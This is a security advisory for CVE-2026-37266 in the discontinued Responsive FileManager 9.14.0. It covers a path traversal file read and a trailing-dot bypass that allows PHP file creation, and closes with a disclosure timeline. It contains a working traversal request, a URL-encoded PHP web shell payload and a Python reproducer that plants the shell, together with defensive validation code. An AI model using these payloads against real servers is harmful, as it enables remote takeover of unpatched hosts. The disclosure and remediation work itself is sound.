
Responsive FileManager Version 9.14.0 Multiple Vulnerabilities – CVE-2026-37266

Written by Julian Nguyen | May 28, 2026 9:27:33 AM

TL;DR

Cyber Security Associates (CSA) identified a Local File Inclusion (LFI) issue and an arbitrary file creation issue in Responsive FileManager version 9.14.0. Both are tracked under CVE-2026-37266.

Responsive FileManager is a PHP-based file manager that allows for the storage, retrieval and creation of files, and ships with filters intended to protect against local file inclusion, path traversal and malicious files being written to the application. Files uploaded through an integration of FileManager are typically intended to be accessible by anyone, without authentication, for ease of hosting images and the like.

The Responsive FileManager project has been discontinued, so no fixes will be made and its current version (9.14.0) remains vulnerable.

Technical Details

Both vulnerabilities are classed as critical, as they can lead to exposure of sensitive files, data breaches, disruption of services and full compromise of the underlying host.

LFI

A weakness was identified in the software’s download feature: the file name handed to it is not constrained to the upload directory, so a path traversal sequence in that name makes the server return any file the web server process can read. The issue is tracked here as Local File Inclusion (LFI); in practice it is an arbitrary file read via the download endpoint. If exploited, it could be used to gain access to sensitive information such as passwords, configuration details or source code. In some cases this kind of issue can also be used as a stepping stone to take full control of the server.

The following affected components and parameters were responsible for the LFI:

Component                          Parameter
filemanager/force_download.php     name

A successful proof-of-concept LFI would look like the following:

Figure 1 – File Manager responds to payload with the sensitive Windows HOSTS file

Arbitrary File Creation

A weakness in the software’s file creation feature allows files of any type, including PHP scripts, to be written to the server despite the built-in extension controls. If exploited, it could lead to the storage of malicious files and the execution of PHP scripts, which in such cases results in full compromise of the underlying host.

The following affected components and parameters were responsible for Arbitrary File Creation:

Component                                     Parameter
filemanager/execute.php?action=create_file    name

A successful proof-of-concept exploitation of Arbitrary File Creation would look like the following:

Figure 2 – Successful upload of the ‘newshell.php’ file. Code execution has been achieved as seen in the URL.

Demonstrating Impact

LFI

A Local File Inclusion (LFI) vulnerability can allow attackers to access sensitive files stored on the server, such as configuration files, credentials or application source code. This information disclosure can expose details that assist in further attacks, including database compromise or privilege escalation. Where exposed credentials grant further access, or where user input is written to server-side files such as logs or uploads that can then be included, LFI may be escalated to remote code execution, giving an attacker full control over the affected host. Successful exploitation may therefore result in the compromise of confidential data, disruption of application integrity and complete loss of system availability.

To demonstrate the impact of this LFI, CSA used Responsive FileManager to read the Windows hosts file (‘C:\Windows\System32\drivers\etc\hosts’, the Windows equivalent of ‘/etc/hosts’). To do so, the following actions were taken:

  • Fetch the ‘/filemanager/sources’ page to obtain a valid ‘PHPSESSID’ session cookie
  • Issue a POST request to ‘/filemanager/force_download.php’ to retrieve a file, attaching the valid ‘PHPSESSID’ cookie

The body of the POST request should contain the following elements:

path=&name=..\..\..\..\..\..\windows\system32\drivers\etc\hosts


This retrieves the Windows hosts file, as shown previously in ‘Figure 1’. The ‘path’ parameter is left empty and the six ‘..\’ components climb from the application’s upload directory to the root of the drive; the number of components needed depends on where the application is installed.

Arbitrary File Creation

It is possible to create arbitrary files using Responsive FileManager by bypassing its controls on file creation. This can be done through the file manager’s ‘execute.php’, specifically the ‘create_file’ action, by appending ‘..’ to the value of the ‘name’ parameter (for example ‘newshell.php..’). With the trailing dots the name does not end in a ‘.php’ suffix as far as the application’s extension check is concerned, but Windows strips trailing dots from file names when the file is written, so the file lands on disk as ‘newshell.php’. As this software is typically used for image and file handling, uploaded files are often accessible from multiple locations without authentication. Under standard configurations, this results in the execution of uploaded PHP code; preventing execution generally requires explicit server-side restrictions (such as disabling the PHP handler for the upload directory), which are not always present.

In such cases, an attacker could upload a malicious file such as a web shell and leverage it to execute arbitrary commands on the server. This would allow full control over the underlying host, including the ability to exfiltrate sensitive data, modify application functionality, pivot into internal systems or disrupt service availability. This can therefore result in complete loss of confidentiality, integrity and availability of any affected environment.

Furthermore, it is possible to leverage this vulnerability to store malicious files, such as malware, on applications that embed Responsive FileManager.

To demonstrate the impact of this vulnerability, CSA used Responsive FileManager to obtain a working web shell and perform command execution on the underlying host. To do so, the following actions were taken:

  • Fetch the ‘/filemanager/sources’ page to obtain a valid ‘PHPSESSID’ session cookie
  • Issue a POST request to ‘/filemanager/execute.php?action=create_file’ to create a new file, attaching the valid ‘PHPSESSID’ cookie

The body of the POST request should contain the following elements:

path=%2F&path_thumb=&name=newshell.php..&new_content=%3Chtml%3E%0A%3Cbody%3E%0A%3Cform+method%3D%22GET%22+name%3D%22%3C%3Fphp+echo+basename(%24_SERVER%5B'PHP_SELF'%5D)%3B+%3F%3E%22%3E%0A%3Cinput+type%3D%22TEXT%22+name%3D%22cmd%22+autofocus+id%3D%22cmd%22+size%3D%2280%22%3E%0A%3Cinput+type%3D%22SUBMIT%22+value%3D%22Execute%22%3E%0A%3C%2Fform%3E%0A%3Cpre%3E%0A%3C%3Fphp%0A++++if(isset(%24_GET%5B'cmd'%5D))%0A++++%7B%0A++++++++system(%24_GET%5B'cmd'%5D+.+'+2%3E%261')%3B%0A++++%7D%0A%3F%3E%0A%3C%2Fpre%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E


This achieves a working web shell and remote command execution, as shown previously in ‘Figure 2’. The ‘new_content’ value is the URL-encoded source of a minimal PHP web shell that passes the ‘cmd’ query parameter to ‘system()’ and prints the output.
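The two procedures above (the force_download.php traversal and the create_file write), as one added Python reproducer. This is example code, not the original page’s or CSA’s tooling. It assumes a plain HTTP Responsive FileManager 9.14.0 install on a Windows host given as a host:port argument, the ‘PHPSESSID’ cookie name and the endpoints, parameters and payload values exactly as this advisory lists them; the web shell source is a trimmed version of the one in the request body above. Use it only against systems you are authorised to test.

```python
"""Reproducer for the force_download.php path traversal and the
execute.php?action=create_file arbitrary file creation described above.

Added example, not the original page's or CSA's tooling. Assumes a plain
HTTP Responsive FileManager 9.14.0 install on a Windows host, the PHPSESSID
cookie name and the endpoints, parameters and payloads as the advisory
lists them."""
import http.client
import sys
from http.cookies import SimpleCookie
from urllib.parse import urlencode

BASE = "/filemanager"
# Payloads from the advisory. The trailing '..' on the shell name is what
# defeats the extension check; Windows drops trailing dots on write, so the
# file lands on disk as newshell.php.
LFI_NAME = r"..\..\..\..\..\..\windows\system32\drivers\etc\hosts"
SHELL_NAME = "newshell.php.."
# Trimmed version of the advisory's shell: runs ?cmd=... through system().
SHELL_SRC = ("<pre><?php if (isset($_GET['cmd'])) "
             "{ system($_GET['cmd'] . ' 2>&1'); } ?></pre>")


def lfi_body() -> str:
    """Form body for POST /filemanager/force_download.php."""
    return urlencode({"path": "", "name": LFI_NAME})


def create_file_body(name: str = SHELL_NAME, content: str = SHELL_SRC) -> str:
    """Form body for POST /filemanager/execute.php?action=create_file."""
    return urlencode({"path": "/", "path_thumb": "", "name": name,
                      "new_content": content})


def session_cookie(set_cookie_values, name: str = "PHPSESSID") -> str:
    """Pick the session cookie out of one or more Set-Cookie header values
    and return it in the form used in a Cookie request header."""
    jar = SimpleCookie()
    for value in set_cookie_values:
        jar.load(value)
    if name not in jar:
        raise RuntimeError(f"no {name} cookie issued")
    return f"{name}={jar[name].value}"


def post(host: str, path: str, body: str, cookie: str) -> bytes:
    """One form POST carrying the session cookie; returns the response body."""
    conn = http.client.HTTPConnection(host, timeout=15)
    conn.request("POST", path, body=body, headers={
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": cookie,
    })
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    return data


def run(host: str) -> bytes:
    """Step 1: get a session from /filemanager/sources. Step 2: read the
    hosts file through force_download.php. Step 3: write the shell through
    execute.php?action=create_file. Returns the hosts file contents."""
    conn = http.client.HTTPConnection(host, timeout=15)
    conn.request("GET", f"{BASE}/sources")
    resp = conn.getresponse()
    resp.read()
    cookie = session_cookie(resp.headers.get_all("Set-Cookie") or [])
    conn.close()
    hosts_file = post(host, f"{BASE}/force_download.php", lfi_body(), cookie)
    post(host, f"{BASE}/execute.php?action=create_file",
         create_file_body(), cookie)
    return hosts_file


if __name__ == "__main__":
    print(run(sys.argv[1]).decode(errors="replace"))
    print("newshell.php written to the upload root; request it with ?cmd=whoami")
```

The builders encode the backslashes as %5C, which the server decodes back to the literal ‘..\’ sequence shown in the request bodies above; the location at which the created shell is served depends on how the upload directory is exposed by the embedding application, so the script does not guess that URL.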

Remediation

Responsive FileManager has confirmed that the project has been discontinued and that no fixes or updates will be made. Version 9.14.0 therefore remains vulnerable to both the LFI and the arbitrary file creation issue. Deployments that still include the component should remove it or, at minimum, restrict access to the ‘/filemanager/’ directory, validate the ‘name’ and ‘path’ parameters against a strict allow-list before they reach the filesystem, and configure the web server so that nothing in the upload directory is executed as PHP.
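As an added reference implementation (not code from the Responsive FileManager project), the following Python shows the checks a deployer patching a local copy would need to apply to the ‘name’ and ‘path’ parameters used by both force_download.php and the create_file action. The function names, the extension allow-list and the upload root path are assumptions for illustration. It rejects both payloads from this advisory, the backslash traversal and the trailing-dot ‘newshell.php..’, and also the plain ‘newshell.php’ and a double-extension name.

```python
"""Reference validation for user-supplied 'path' and 'name' parameters of a
file-manager download or create handler.

Added example, not Responsive FileManager code. Function names, the
extension allow-list and the upload root are assumptions for illustration."""
import os
import re
from pathlib import Path

# Assumption: the deployment only hosts images and documents. Anything the
# web server could execute (php, phtml, phar, ...) is simply not listed.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf", "txt"}
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]*\.[A-Za-z0-9]+")


def sanitize_filename(name: str) -> str:
    """Return the name unchanged if it is a plain 'base.ext' file name,
    otherwise raise ValueError. Reject rather than rewrite: every rewriting
    step is another chance for the filesystem to disagree with the check."""
    if not name or "\x00" in name:
        raise ValueError("empty name or NUL byte")
    if "/" in name or "\\" in name:
        raise ValueError("path separators are not allowed")
    # Windows silently drops trailing dots and spaces on write, which is
    # exactly how 'newshell.php..' passes a suffix check yet lands on disk
    # as newshell.php.
    if name != name.rstrip(". "):
        raise ValueError("trailing dots or spaces are not allowed")
    # One base, one dot, one extension: this also excludes '..', dot-files
    # and double extensions such as shell.php.png.
    if not SAFE_NAME.fullmatch(name) or len(name) > 255:
        raise ValueError("name is not of the form base.ext")
    ext = name.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension {ext!r} is not on the allow-list")
    return name


def resolve_inside(upload_root: str, subdir: str, name: str) -> Path:
    """Resolve upload_root/subdir/name and prove the result is still under
    upload_root. subdir is the user-controlled 'path' parameter. realpath()
    follows symlinks, so a planted symlink cannot be used to escape either."""
    root = Path(os.path.realpath(upload_root))
    target = Path(os.path.realpath(root / subdir.strip("/\\") / name))
    try:
        target.relative_to(root)
    except ValueError:
        raise ValueError(f"{target} escapes {root}") from None
    return target


def is_safe(upload_root: str, subdir: str, name: str) -> bool:
    """True only if the name is well formed and the resolved path stays
    inside the upload root."""
    try:
        resolve_inside(upload_root, subdir, sanitize_filename(name))
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed inputs: the two payloads from this advisory plus benign
    # and borderline names. The upload root is a placeholder path.
    cases = [
        ("/", r"..\..\..\..\..\..\windows\system32\drivers\etc\hosts"),
        ("/", "newshell.php.."),
        ("/", "newshell.php"),
        ("/", "shell.php.png"),
        ("../../etc", "hosts.txt"),
        ("/", "image.png"),
    ]
    for subdir, name in cases:
        verdict = "accepted" if is_safe("/srv/uploads", subdir, name) else "rejected"
        print(f"path={subdir!r} name={name!r}: {verdict}")
```

The name check and the containment check are deliberately independent: the first stops the trailing-dot trick and anything containing a separator, the second catches traversal smuggled through the separate ‘path’ parameter and through symlinks, which a string check on ‘name’ alone would never see.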

Disclosure Timeline

21/08/2025: Vulnerability identified by Julian Nguyen and reported to the vendor.

21/08/2025: The vendor responded that the project has been discontinued and that no fixes will be made.

21/08/2025: CSA asked the vendor for permission to publish this blog post before the 90-day response window of the responsible disclosure procedure had elapsed, as no fixes are to be made.

22/08/2025: Confirmation was provided by the vendor.

28/04/2026: MITRE assigns the vulnerability a CVE number (CVE-2026-37266).